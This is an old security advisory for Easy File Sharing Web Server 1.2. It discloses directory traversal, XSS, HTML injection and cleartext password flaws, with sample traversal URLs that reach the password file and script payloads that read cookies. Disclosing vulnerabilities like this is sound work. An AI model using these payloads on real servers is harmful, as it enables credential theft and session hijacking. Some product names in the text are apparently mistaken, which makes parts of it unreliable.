Advisory for Easy File Sharing web server 1.2...

---

------------------------------------------------------------------
          Easy File Sharing Web Server 1.2

------------------------------------------------------------------
                  -= by Dr_insane (dr_insane@pathfinder.gr) =-



Product:
--------
Easy File Sharing Web Server 1.2


Vunerability(s):
----------------
1.Directory Traversal Bugs
2.XSS vulnerabilities
3.HTML Injection
4.Passwords in clear text

Description of product:
-----------------------
Easy File Sharing Web Server is a file sharing system that allows visitors to upload/download files easily through a Web Browser (IE, Netscape, Opera etc.). It can help you share files with your friends and colleagues. They can download files from your computer or upload files from theirs.They will not be required to install this software or any other software because an internet browser is enough. Easy File Sharing Web Server also provides a Bulletin Board System (BBS, Forum). It allows remote users to post messages and files to the forum. 


VUNERABILITY / EXPLOIT
======================
There is multiple vulnerabilities in Postnuke Easy File Sharing Web Server 1.2 as described below. 

1.Directory traversing 

Easy File Sharing Web Server have a Directory Traversal Vulnerability Using the string '../' in a URL, an attacker can gain read access to any file outside of the intended web-published filesystem directory.

There is not much to expand on this one....

Example:
 http://127.0.0.1/../../../autoexec.bat to show autoexec.bat 
 http://127.0.0.1/.../.../.../program files/Easy File Sharing Web Server/users.sdb  get the server password file

Also:
http://127.0.0.1/msg.ghp?forumid=4&id=/../../../../../../../../windows/win.ini
http://127.0.0.1/msg.ghp?forumid=/../../../../../../../../windows/win.ini

etc etc etc

2.XSS vulnerabilities

A vulnerability exists in the  Easy File Sharing Web Server that involves incorrect filtering of server signature data. The vulnerability could enable an attacker to hijack web sessions, allowing a range of potential compromises on the targeted host.

The vulnerable urls are:

http://127.0.0.1/newmsg.ghp?forumid=1 Insert Evil javascript code in "Your message field"

The following URL will demonstrate the attack: 

Some browsers submit the malicious host header when parsing this request:
 Host: <img src="" onerror="alert(document.cookie)"> 

ex. if we supply this code: <script>alert(document.cookie)</script> we will get:

TEMPLATE:standard;LANG=english; TOKEN:121234122; TOKEN_1=34123123; SHOW_FEATURES=0; db_pass; db_user; SESSIONID=1172; UsserID:dr_insane; PassWD=passtest1111

It is possbile for someone to get the username and the password.In our example
The username is:dr_insane and the password: passtest1111

3.HTML Injection

Any user can inject html code when create a new post.
 The bug is in the post icon :

 <img src="icon.gif" etc.>
 If you create a personalized form with this code: icon.gif">
<script>alert('bug');<script><anytag="
 the final code of the post icon is :
 <imgsrc="icon.gif"><script>alert('bug');<script><anytag="" etc.> 

4.Passwords in clear text

A vulnerability has been identified in Enceladus Server suite allowing malicious, local users to see usernames and passwords.

The problem is that usernames and passwords for the server are stored in clear text in the folder "users.sdb".


Local:
 ------
Yes

Remote:
 -------
We can 0wn the server via remote!


 Credits:
 --------
Dr_insane
dr_insane@pathfinder.gr , dr_insane@hack.gr
Http://members.lycos.co.uk/r34ct/








----------------------------
Dr_Insane
members.lycos.co.uk/r34ct/
----------------------------

______________________________________________________________________________________
http://mobile.pathfinder.gr - Pathfinder Mobile logos & Ringtones! 
http://www.pathfinder.gr - ÄùñåÜí mail áðü ôïí Pathfinder!